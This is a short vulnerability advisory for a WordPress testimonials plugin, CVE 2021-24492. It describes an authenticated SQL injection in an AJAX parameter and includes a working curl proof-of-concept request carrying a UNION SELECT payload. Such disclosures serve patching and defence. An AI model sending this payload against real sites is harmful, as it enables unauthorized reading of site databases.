Handsome Testimonials & Reviews < 2.1.1 – Authenticated (Subscriber+) SQL Injection | CVE 2021-24492

Description

The hndtst_action_instance_callback AJAX call of the plugin, available to any authenticated users, does not sanitise, validate or escape the hndtst_previewShortcodeInstanceId POST parameter before using it in a SQL statement, leading to an SQL Injection issue.

Proof of Concept

curl -i -s -k  -X $'POST' \
    -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: https://example.com' \
    -b $'[any authenticated user]' \
    --data-binary $'action=hndtst_previewShortcodeInstance&hndtst_previewShortcodeInstanceId=-5049 UNION ALL SELECT current_user(),current_user(),CONCAT(0x716b7a6b71,0x5a4a547a475a4e5657516472454b4d4c524764525a69416b7a767961715957584947776954594d4d,0x716a717a71),NULL-- -' \
    $'https://example.com/wp-admin/admin-ajax.php'